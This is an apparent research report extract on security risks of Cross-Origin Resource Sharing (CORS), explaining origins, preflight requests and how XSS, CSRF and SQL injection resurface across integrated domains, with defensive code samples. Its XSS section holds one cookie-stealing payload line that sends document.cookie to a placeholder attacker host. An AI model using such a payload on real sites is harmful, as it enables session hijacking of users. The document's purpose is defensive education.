CORS and well-known vulnerabilities

This article is a modified version of an extract from:

Please note that this assessment was not made to evaluate conventional uses of CORS, but only its applicability for building systems that collaborate with each other through CORS, forming a complex ecosystem.


In order to better evaluate our use of CORS, we conducted initial research on the protocol itself, gathering the most relevant facts that would guide our analysis into a non-conventional approach for studying cyber-security issues in web applications. This chapter is divided into two major sections: Protocol Analysis and System Analysis. While the former discusses relevant topics and guidelines for evaluating the use of CORS from a generalized point of view, the latter exhibits our analysis of how CORS was applied in our system.

Protocol Analysis


As part of this project, we sought to analyze the contents presented by the Cross-Origin Resource Sharing W3C Recommendation (16 January 2014) [12] with the objective of compiling the main aspects with potential to open vulnerabilities in complex web applications. We studied the specification and compared the protocol’s behavior with the patterns exhibited by the most frequent web application vulnerabilities. This document gathers our findings, demonstrating both that threats may come from diverse sources and that the lack of material directly connecting CORS to old and well-known vulnerabilities may cause a false sense of security. We conclude our work with the strong assertion that trust, within the context of that recommendation, means an effective transfer of responsibility for security issues, from the original application to its clients.

The W3C Recommendation [12] subject to this assessment offers incredible flexibility to build complex and efficient web applications by extending the capabilities of the well-known AJAX techniques. However, it greatly increases the attack surface in composed interactive systems, demanding further investigation.

This assessment shows that new security concerns have emerged, but we sought to highlight the fact that old and well-known vulnerabilities can easily resurface within a project, as our sources discuss the emergent needs but fail to acknowledge the means by which old threats can be unearthed through the association of web systems. Misconfiguration was seen as the most probable problem, along with the lack of comprehensive material demonstrating the connections between these new specifications and old problems, a fact that aggravates what might be seen as resolved. We addressed in this material: XSS, CSRF, and SQL-injection vulnerabilities.

Our findings indicate that vulnerabilities exploitable by targeting client-side technologies in an application issuing CORS requests will lead to vulnerabilities in the original system, even if it has been hardened by conventional techniques to resist such types of attack. This is due to the simple fact that one can use the vulnerable system to convey malicious data targeting an embedded document; for instance, through XSS and CSRF. However, attacks where the data has to cross the original application's trust boundaries, passing through conventional defenses, are only as effective as direct attacks. Due to those facts, we want to highlight the importance of recognizing that, when facing the assessed vulnerabilities, a system's security will be lowered to the lowest level among all applications whose contents are included in an aggregated document; thus, allowing other domains to use an application as part of a bigger project is effectively a responsibility transfer.

This study was motivated by the fact that our system uses CORS to include elements from SS in most applications within the TrueNTH initiative, preserving important elements while considering their desirable appearance and behavior.

Cross-Origin Resource Sharing definition

Cross-Origin Resource Sharing is a relatively recent technology, developed over the past few years, that finally achieved the status of a W3C Recommendation in 2014. That document shows the maturity attained and how it sought to fulfill a major need voiced by web developers: the necessity of integration.

Users, in their need for more integrated technologies and their desire for more complex functionalities, have long demanded the use of data originating from multiple domains. This desire was reflected in the work of engineers, who developed creative ways of requesting and handling information originating in domains outside their control. Moreover, AJAX raised the bar, since it became a ubiquitous strategy for client applications to dynamically request data and use it on the fly.

All those needs were addressed by the W3C recommendation, which made it possible to request foreign content through AJAX requests; before CORS, security restrictions imposed by all major browsers would forbid this kind of action.

Finally, CORS is a mechanism to enable client-side cross-origin requests [12]. In summary, it allows requests to be identified by their origin, while the server-side application is able to verify security restrictions, informing the browser whether a request is permitted.


Some interesting data is shown by TECHWARS when requesting the tool to compare CORS with other technologies with similar purposes. We could see that the community support for CORS is significantly lower when comparing Stack Overflow questions, without discriminating security-related issues [23]. This could reflect a lack of support and adoption, a possibility that supports our belief that more information is necessary.

In our research, we noticed the lack of references helping developers to analyze and use CORS in a secure manner and the scarcity of comprehensive material connecting CORS to well-known vulnerabilities. Reliable sources, such as OWASP, fail to address CORS holistically, at all levels of a web application and in a systematic approach, which may lead developers to a false sense of security. Furthermore, the lack of explicit material dealing with old threats may cause developers to rely on conventional defenses, reinforcing an unjustifiable feeling of safety. Moreover, many sources indicate problems, including well-grounded documents such as RFCs commenting on particular issues; however, engineers need to go through numerous sources, studying issues across an immense set of unreliable or obscure information.

In this report, we also focused on the implications one has to analyze when studying the possibility of using CORS to grant other domains access to a resource. Additionally, we sought to reinforce OWASP recommendations to the general public and extend them in an easy-to-implement fashion, to ensure CORS is well understood and safely used. Finally, we will also discuss language problems that might cause issues.


According to W3C, CORS is a mechanism to enable client-side cross-origin requests. This means that this protocol was developed to allow foreign applications to request resources from other domains.

While this capability had in fact been around for many years for simple elements, such as images, ECMAScript (JavaScript) code was not allowed to make such requests, mainly due to the same-origin security policy implemented by all major browsers.

JavaScript provides developers with powerful tools to manipulate the Document Object Model (DOM) and the events associated with the elements presented within the page, triggering functions and permitting the development of truly interactive client-side applications. However, those capabilities have been exploited by malicious developers and users (threat agents) to perform attacks in creative ways.

Via AJAX, programmers can create and personalize requests towards targeted resources, a capability especially dangerous, in the wrong hands, if cross-site requests were allowed. If a browser permitted this type of request, malicious pages would be able to create tailored HTTP requests, using data available on the client side and reading data coming from the server side for nefarious purposes. For instance, if a user visited a malicious page while holding an active session with their bank, and this page was able to issue requests to the bank's site, the user would be extremely vulnerable, possibly losing money through unsolicited transfers. In summary, cross-domain AJAX requests were not allowed due to their ability to perform requests with malicious data, tailored headers, and non-idempotent request sequences [24] to read and manipulate data, among other capabilities that would introduce many security issues. Therefore, this was not permitted under the same-origin security policy.


Before explaining the mechanisms behind CORS, we need to understand what an “origin” is, as it is one of the key concepts in CORS. RFC 6454 is one of the best documents for obtaining a complete understanding of how CORS and the same-origin security policy work. The following quote was extracted from that document, and it defines “origin” as it is seen by browsers (an example of user-agents).

“...user-agents group URIs together into protection domains called “origins”. Roughly speaking, two URIs are part of the same origin (i.e., represent the same principal) if they have the same scheme, host, and port...” [25]
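The grouping rule quoted above can be expressed programmatically. The following sketch (assuming Node.js and its WHATWG URL parser; the default-port table is our own simplification) compares two URIs by scheme, host, and port:

```javascript
// RFC 6454-style same-origin comparison: two URIs share an origin
// when scheme, host, and port all match. The WHATWG URL parser
// reports an empty `port` when the default port is implied, so we
// fall back to the scheme's default before comparing.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

function originOf(uri) {
  const u = new URL(uri);
  return {
    scheme: u.protocol,
    host: u.hostname,
    port: u.port || DEFAULT_PORTS[u.protocol] || '',
  };
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}
```

Note that `http://foo.example/` and `http://foo.example:80/` compare as the same origin, while a change of scheme or host places a URI in a different protection domain.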

The RFC also deserves special consideration for its discussion about origin, particularly around the idea of the existence of “benign web sites” and “malicious web sites”, as it discusses and gives examples such as the following.

“...the user-agent implementor [sic] might wish to prevent scripts retrieved from a malicious server from reading documents stored on an honest server, which might, for example, be behind a firewall...” [25]

This interpretation opens space to neglect the central theme of our studies: the extended attack surface caused by CORS. In this context, it is essential to define trust and its meaning in order to perform assessments and deal with threats. By adopting the view in which servers are neatly separated into malicious and benign, an inattentive developer might be distracted from the existence of benign but vulnerable systems, which can be used as threat vectors. This could lead to misplaced trust and an erroneous interpretation of what trust actually means under the new capabilities provided by CORS.


Cross-Origin Resource Sharing (CORS) is also the W3C recommendation that defines how user-agents and server applications should proceed when facing requests that come from different origins. Basically, it stipulates a communication protocol that allows the involved parties to gather enough information about each other in order to evaluate whether a request is valid and whether access can be granted, determining if the request should succeed or fail [26]. Thus, it can be seen as a handshake protocol, without going further into security merits. This section exhibits the basics of this protocol in order to discuss security issues later. The reader interested in implementing CORS in client-side applications is encouraged to read [27], [28], and [29], while for server-side applications an overview can be found in [30]. Additionally, important security considerations, including testing methodologies, can be found in [14], [15], and [13].

CORS extends the traditional security model normally enforced by user-agents. In the conventional model, limitations prevent client-side Web applications running in one origin from obtaining data from and submitting requests to another origin, including unsafe HTTP requests that could be automatically launched towards alien sites [12]. CORS extends this model by allowing the server application to verify requests' origins, by adding specific headers that allow the user-agent to verify the policies enforced by the server, and by including mechanisms to make queries before sending “complex requests”. CORS adds the Origin header to all CORS requests in order to provide the server-side application with data about where the requests are coming from. For instance, in an HTTP request, one should expect to see the origin represented as in the following example.

Origin: http://foo.example

When the server receives such information, it can take the necessary actions and issue a response with the requested resource, or send informative data when handling queries (more in Section 6.2.3). When informing the browser of an allowed domain, it should use an Access-Control-Allow-Origin header, as in the following example.

Access-Control-Allow-Origin: http://foo.example

Alternatively, the following can be used to permit requests coming from any domain.

Access-Control-Allow-Origin: *

Those simple headers allow the user-agent to communicate effectively with the server, while the latter can verify its own security policies before issuing a response, if any is to be sent. Following the example given by Mozilla [28], we can see how simple JavaScript code could issue such a request.

var invocation = new XMLHttpRequest();
var url = 'http://bar.other/resources/public-data/';

function callOtherDomain() {
    if (invocation) {
        invocation.open('GET', url, true);
        invocation.onreadystatechange = handler;
        invocation.send();
    }
}

As we can see, the programmer does not have to define any special instruction beyond programming a regular AJAX request; all the details are managed by the user-agent and the server-side application. This code would generate a request like the following.

GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://foo.example/examples/access-control/simpleXSInvocation.html
Origin: http://foo.example

This request is a cross-site request, requiring a resource from bar.other to be used in an application from foo.example. A response coming from this server could look like the following example, which approves any domain.

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 00:23:53 GMT
Server: Apache/2.0.61
Access-Control-Allow-Origin: *
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/xml

Security notes on origins

Developers should be aware of the resources' nature when configuring access through CORS. When analyzing the possible values for the Access-Control-Allow-Origin header, the resources need to pass through an evaluation in order to verify if they are actually eligible to become a publicly available or partially restricted artifact.

In the non-normative security considerations section of the W3C recommendation [12], we can find excellent guidelines for this judgment process. In summary, it recommends not returning the header if the resource is not useful to other domains, and only using the "*" wildcard if the resource is truly public and does not contain sensitive data. Additionally, it argues that using the header in combination with the wildcard is better justified if the resource can be translated into a publicly available artifact accessible via simple tags and GET requests (idempotent operations). We recommend going through this section of that document when judging the use of CORS.

Although it is easy to find recommendations about the matter in reliable sources [12] [14], we would like to add a consideration when evaluating the use of CORS in complex architectures and in any application system in strongly regulated domains. One of the goals of this report is to discuss CORS in complex and strongly integrated systems, normally desired in enterprise-level initiatives. This argumentation underpins our usage of CORS in this project, especially in evaluating the safety of the use case where an alien component is involved in our authentication process.

We want to make clear that CORS is safe to use, but it requires extra care when designing systems and discussing agreements with partners. In our argumentation, we present CORS as a technique that will increase the attack surface when dealing with more interactive applications. With that in mind, one can see that part of our system will be running in a foreign domain, possibly out of our control. This fact represents a huge risk, if services and responsibilities are not well defined among the involved parties. Some of the evaluated vulnerabilities are just out of our control when CORS is used and defining who is liable when a security breach occurs is essential in some fields, especially if data breach is a consequence.

For instance, if two health-related applications are running on different origins, possibly different domains, sharing resources through CORS, and one of them is vulnerable to an XSS exploitation leading to a security breach on the second one, it should be clear in contracts, or other legal means, who is responsible. The same is true for many regulated domains, and for any system that deals with personally identifiable information (PII), for that matter. Defining liability and responsibilities is essential, including within terms-of-use documents. If an organization is not able to define the risks clearly in sensitive domains or reach an agreement with a particular partner, CORS should be avoided. In summary, "origin" fields represent an explicit permission, and we argue that by granting it there is a transfer of responsibility to a partner; all risks associated with this fact should be evaluated.
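The explicit-permission view argued above suggests treating the allow-list itself as a reviewed artifact. The following is a minimal sketch, with hypothetical partner origins, of a server-side helper that only ever echoes vetted origins:

```javascript
// Treat the allow-list as an explicit contract: only origins that
// passed a review (and, where required, a legal agreement) are ever
// echoed back. Any other origin receives no CORS headers at all,
// so the browser blocks the cross-origin read.
const ALLOWED_ORIGINS = new Set([
  'https://portal.example', // assumed partner origins, for illustration
  'https://app.example',
]);

function corsHeadersFor(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) {
    return {}; // not allowed: stay silent
  }
  return {
    'Access-Control-Allow-Origin': requestOrigin, // echo the single vetted origin
    'Vary': 'Origin', // responses differ per origin: keep shared caches honest
  };
}
```

Echoing one specific origin, rather than "*", keeps the permission auditable and revocable per partner.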

Preflighted requests

CORS is an extremely flexible technology and it allows applications to inform user-agents how to manage cache, origins, and even credentials. However, for the purposes of this report, we focused on its main functionality and its semantics in order to understand our arguments in a high-level discussion. We finalize the CORS section by explaining preflighted requests while further details will be discussed as they become necessary in the following sections.

CORS defines what it understands as “simple” requests and differentiates this group from the ones that require an initial query, the preflight, before sending the server the real HTTP request; asking permission before acting. A request is simple if it uses simple methods and headers. Simple methods (case-sensitive) are HEAD, GET, and POST. The recommendation defines simple request headers as follows: "A header is said to be a simple header if the header field name is an ASCII case-insensitive match for Accept, Accept-Language, or Content-Language or if it is an ASCII case-insensitive match for Content-Type and the header field value media type (excluding parameters) is an ASCII case-insensitive match for application/x-www-form-urlencoded, multipart/form-data, or text/plain." [12] Separately, it defines the simple response headers (case-insensitive) as Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, and Pragma.

Figure 6.1: CORS flow


What this means is that the technology is able to detect when abnormal and possibly dangerous requests are being used (not in the security sense, but relative to what it expects to be usual; in the other cases it is better to ask whether the server is able to handle uncommon requests). For instance, an application could use custom headers, which is perfectly normal, but it is better to verify with the server that it is able to handle the requests. The user-agent sends a query, via an HTTP OPTIONS request, which contains information describing the characteristics of the original request: what headers it wants to use, via which method, and from what origin. The server-side application evaluates the request and sends back which headers it can accept, which methods, and from where. Additionally, it can inform the user-agent about cache policies, whether the response will vary for different origins, and whether credentials are allowed. Figure 6.1 demonstrates the process' flow.
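The decision the server makes during this exchange can be sketched as a pure function. The policy values and function names below are illustrative assumptions, not part of any specification:

```javascript
// Sketch of the server side of a preflight exchange: given the
// Origin, Access-Control-Request-Method, and
// Access-Control-Request-Headers values from the OPTIONS query,
// decide whether the "real" request will be accepted.
const POLICY = {
  origins: new Set(['https://app.example']),
  methods: new Set(['GET', 'POST', 'PUT']),
  headers: new Set(['content-type', 'x-requested-with']),
};

function answerPreflight(origin, method, requestedHeaders) {
  const headersOk = requestedHeaders
    .every((h) => POLICY.headers.has(h.toLowerCase())); // header names are case-insensitive
  if (!POLICY.origins.has(origin) || !POLICY.methods.has(method) || !headersOk) {
    return null; // deny: respond without any CORS headers
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Methods': [...POLICY.methods].join(', '),
    'Access-Control-Allow-Headers': [...POLICY.headers].join(', '),
    'Access-Control-Max-Age': '600', // let the user-agent cache this result
  };
}
```

Returning `null` (no CORS headers) rather than an explicit error is the usual denial: the user-agent then refuses to send the real request.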

Security notes about preflighting

The protocol is clear on how to request information from web servers; however, there is no guarantee that all user-agents will correctly follow the recommendation or even attempt to comply with it. Additionally, there are old user-agents that are able to issue conventional requests, allowing cross-site requests, without following the recommendation. Furthermore, there is malicious code around, which might try to spoof information. For these reasons, the server-side application is ultimately responsible for enforcing its security policies for every resource. Additionally, under no circumstances should the origin be used as the only authentication/security mechanism in security controls, if such controls are judged to be necessary.

A reliable set of recommendations on the matter is given by the HTML5 Security Cheat Sheet [13]. There, one can find security concerns that were ignored by most development-oriented pages, including the recommendation itself [12] and Mozilla's article on CORS [28]. Additionally, it is important to highlight the need for protection not only for simple, non-preflighted requests, as mentioned in that document, but for any type of request, in order to verify that the user-agent is indeed following the rules.

Finally, the recommendations found in CORS Origin Header Scrutiny [14] reinforce several of the guidelines previously made, including IP caching to prevent attackers from using brute force to guess legal parameters. The document also illustrates the use of Java EE filters to enforce its IP cache control, which suggests filters as a good way to enforce security controls, individually or in groups. By using filters, the development team has a way to separate the security controls from the business logic, with increased freedom to verify security restrictions programmatically, including white-listing and personalized policies for different domains.
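The filter approach described above can be sketched, framework-free, as composable functions; all names here are hypothetical, and a real Java EE filter chain would differ in detail:

```javascript
// Security checks live in small composable "filters" applied before
// the business handler, so white-lists and per-domain policies can
// evolve independently of business logic.
function originFilter(allowedOrigins) {
  return (req) =>
    allowedOrigins.has(req.headers.origin)
      ? null // pass control to the next filter
      : { status: 403, body: 'origin not allowed' };
}

function applyFilters(filters, handler) {
  return (req) => {
    for (const filter of filters) {
      const rejection = filter(req);
      if (rejection) return rejection; // short-circuit on the first failure
    }
    return handler(req);
  };
}

// Example: a service that only answers requests from one vetted origin.
const service = applyFilters(
  [originFilter(new Set(['https://app.example']))],
  () => ({ status: 200, body: 'ok' })
);
```

Further filters (IP caching, credential checks, per-domain policies) slot into the same chain without touching the handler.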

Target vulnerabilities

In this section, we explain the most common web vulnerabilities that fed our concerns and inspired the development of this report. We will discuss XSS, CSRF, and SQL injection.

Although we recognize that this is just a small subset of all the vulnerabilities that can emerge in web applications, we intended to highlight the most common ones, which are also easily exploitable and can be neglected by developers used to traditional countermeasures. Therefore, we sought to unearth well-known vulnerabilities that would be aggravated by the increased attack surface brought about by CORS. It should be clear that throughout this section we sought to discuss how the attack surface was enlarged and why conventional countermeasures fail. Misconfiguration has been addressed when necessary, but dedicated sections discuss the matter further in most of the security-related documents we used as references.

XSS: Cross-site scripting

“The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.”[31]

One of the most common weaknesses is the failure to neutralize malicious input that might lead the client-side application to execute instructions outside its purpose, also referred to as Cross-site scripting (XSS), a vulnerability normally found in web applications. It is present whenever an application permits the injection of malicious data into victims' client-side web applications. Normally, it is exploited by the injection of malicious code into the client's browser session, which will be interpreted by the user-agent in order to accomplish the attackers' objectives. This attack is especially dangerous because the actions triggered by the malicious code run under the same-domain policy enforced by the user-agent.

This means that the client is unable to distinguish between legitimate and malicious code; thus, the browser will act as if the code was indeed part of the application. On the other side, the server will see any request made as legitimate and will act on it as on any regular request.

The quote above, extracted from MITRE's Common Weakness Enumeration under the CWE-79 entry (Improper Neutralization of Input During Web Page Generation), basically describes all classified types of XSS. This definition points to the fact that the weakness is caused by an attacker being able to provide data to an input entry point, without proper defenses, leading to such data being used to dynamically generate content for legitimate users.

Figure 6.2: XSS type 2 - Infection


The diagram depicted in figure 6.2 describes a type-2 XSS attack, where a malicious user sends data to the web application. Without proper defenses, the data is stored in the database and used in the future to generate content for legitimate users. In the diagram, we can see that the attacker used a data entry point to store a malicious piece of information in the database, via some flaw found in the server application. Later, legitimate users requesting content that triggers the use of this data to dynamically generate responses will receive the attacker's data, as illustrated by figure 6.3.

Although it might seem improbable, this sort of attack is in reality a common technique: it is easy to exploit, and flaws can be found with automated tools, requiring little knowledge to succeed.

Figure 6.3: XSS type 2 - Exploitation


In order to demonstrate the simplicity of this attack, the following paragraphs discuss a simple example extracted from an XSS SEED lab [32], where the system was purposely made vulnerable in order to present an attack that is extremely effective, along with a simple vulnerability that would allow small worms to propagate.

Figure 6.4: XSS type 2 - Infection example


As figure 6.4 illustrates, the code was injected (simply typed) into a form used to modify the user's profile. The figure depicts a small piece of JavaScript code used to create a pop-up message. With a simple text editor, one could have created this code and saved it in their main profile page. After performing this attack, anyone visiting this person's profile would see a pop-up, as exemplified by figure 6.5. Of course, a malicious user would code more harmful instructions, such as sending cookies to a remote server or performing unauthorized transactions using the current user's session. The next example shows how a cookie can be sent to a remote server by simply adding an image tag into the page, which can lead to session hijacking.

// attacker.example is a placeholder for an attacker-controlled host
document.write('<img src=http://attacker.example/?c=' + escape(document.cookie) + '>');

To protect against such a dangerous attack, developers have traditionally used encoding and white-listing techniques, which prevent input data from being interpreted as code or from even reaching the storage location. There are several ways to protect against this attack, but they are normally seen in server-side applications, because client-side protection can be easily bypassed – although client-side mechanisms can help reduce the server load by informing the user about invalid formats and speeding up feedback, among other non-security-related objectives.
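A minimal sketch of the encoding countermeasure mentioned above, escaping the characters HTML treats as markup before user-supplied text is emitted:

```javascript
// Output encoding: user-supplied text is HTML-escaped before being
// embedded in a page, so injected markup renders as inert text
// instead of executing in the victim's browser.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  }[ch]));
}
```

With this applied at output time, the profile payload from the SEED lab example would be displayed as literal text rather than interpreted as a script.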

Figure 6.5: XSS type 2 - Exploitation example


As we can see in figure 6.6, an application can be protected to reject malicious data, or at least to use a cleaner version of it.

Figure 6.6: XSS type 2 - Protected system


However, when we grant access to a resource through CORS, the attacker no longer has only one target application: every application used to build the integrated system turns into a target, possibly able to convey malicious data tailored to affect any of the participant subsystems.

That is why we seek to highlight that the attack surface is extended and conventional defenses are not applicable. Figure 6.7 illustrates this new scenario in a diagram. Whenever an attacker cannot inject code directly into the application's database, for instance, they might be able to choose a second target to convey their code. In the diagram, a complex and integrated application is accessed by the user, who receives a response and executes several requests to foreign domains in order to gather data from different locations and assemble the desired content. For instance, if an application were to exhibit a brief description field of our infected profile when the user makes a comment in a second application, the code would be executed inside a program that was not our original, vulnerable one.

Figure 6.7: XSS type 2 - XSS through CORS


We need to realize that CORS will manage resources as AJAX used to, and the content delivered to the client application will be formed by mixing data while interacting with multiple domains in a transparent manner. What this effectively means is that a worm propagating itself through one application can actually carry code to affect a second system, using the first one merely as a delivery mechanism. Additionally, by looking at how XSS works, it should be noticed that there are not many options for a domain to protect itself once access has been granted to a vulnerable domain.

Due to this new behavior, in addition to the test recommendations made by OWASP [15], we strongly recommend testing every client domain for XSS problems. Several sources indicate that CORS should have a limited use, but the potential to build flexible and integrated systems, distributed across providers, should not be ignored. We analyzed this use specifically to stimulate its usage in building complex systems. Nevertheless, the architecture needs to be well planned and supervised by a security professional. Additionally, it should be understood that the global architecture will involve several parties, and a clear understanding of liability and responsibilities must be stipulated. In complex architectures, possibly with highly specific security requirements, a security shell can be used to manage access, with filters and a database of policies to help the shell dynamically evaluate each request and manage cache. Simple filters can be used for smaller applications. A written policy with requirements for allowing new origins may become necessary as the system grows. Google Maps, for example, will not allow CORS as it may lead to a policy violation, off-line use of data, as CORS does not support such control [30].

CSRF: Cross-Site Request Forgery

In this section, we briefly discuss CSRF, mainly because the problem is well documented: recommendations can be found in OWASP material [13] and are included in the W3C recommendation. Furthermore, the defenses remain the same as traditionally applied, the concerns caused by CORS can be easily understood by analogy with the arguments presented in the last section, and the common weaknesses that normally lead to it are well documented by the definition found in MITRE's enumeration.

“The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.” [33]

CSRF or XSRF stands for cross-site request forgery, which is normally a type of attack where a victim has a session within a trusted web application, or holds enough information to create one, and visits an infected web page that exploits this session/data for undesired purposes. The malicious code creates an HTTP request directed to the trusted site within the victim's session, leading to collateral effects. Generalizing, it is the use of any request a web application cannot identify as legitimate, as a reflection of the user's intentions, or as a forgery originating from an illicit source, normally a malicious alien domain.

In addition to the simple exploitation of the presented weakness, for the purposes of this report, a fact that called our attention is that most CSRF countermeasures can be bypassed through XSS: as JavaScript can read through the elements of a response/page, it can locate and take advantage of the tokens normally used as countermeasures. Possibly, it can also send them to a remote server for hijacking, or invoke a malicious page with the information, performing a hybrid XSS-CSRF attack.


SQL-injection

SQL-injection is used here to illustrate a different kind of vulnerability, present in server-side applications. We sought to contrast this situation with the previous ones, where the vulnerabilities were located in client-side applications. Here, we abuse the terminology to indicate the exploitation point rather than the vulnerability location. Additionally, we try to convey the idea of multiple origins, where one origin can generate data for client-side applications carrying exploits for a second one.

SQL injections are performed by sending malicious data in order to affect database operations. What this means is that the data necessarily has to cross trust boundaries, eventually passing through server-side protections. If the server is well protected against this type of attack, nothing needs to be done apart from the traditional countermeasures.
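The boundary-crossing point can be made concrete. The contrast below between naive string concatenation and placeholder binding is illustrative, with `db.query` standing in for any driver that accepts parameterized statements (only the naive builder is exercised here):

```javascript
// Injectable: attacker-controlled input becomes part of the SQL text
// itself, so a crafted value can change the query's structure.
function naiveQuery(username) {
  return "SELECT * FROM users WHERE name = '" + username + "'";
}

// Conventional countermeasure: the statement and the value travel
// separately, so the input can never alter the query's structure.
// `db` is a hypothetical driver handle with a parameterized query API.
function safeQuery(db, username) {
  return db.query('SELECT * FROM users WHERE name = ?', [username]);
}
```

A value such as `alice' OR '1'='1` turns the naive query into one that matches every row, while the parameterized form would simply look for a user with that literal, odd name.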

However, it is easy to identify problems if one of the partners is vulnerable as described before. For instance, it is likely that partners hold sensitive information about our system in their databases, or just general information about us. If our partner is compromised, all this information is vulnerable. Furthermore, if the database is compromised and information in it is used to generate content for users, we are again vulnerable to XSS and XSRF in hybrid, multilevel attacks. Additionally, this corruption could lead to extra damage if the content is used by our system, including invalid data that can escalate into DoS issues.


Our assessment of the CORS technology shows that it has a high potential to simplify how we build complex applications. It is able to increase integration and bring enterprise-level systems to a new level, allowing the use of distributed sources of content in a transparent and easy-to-implement manner. However, the extended attack surface it generates can be hard to manage, and a cautious evaluation is required, including with partners. Security is put at risk if it is not well managed and policies are not respected. Furthermore, using CORS is a decision that will lead to a responsibility transfer; thus, it should not be a purely engineering decision but should require management approval.
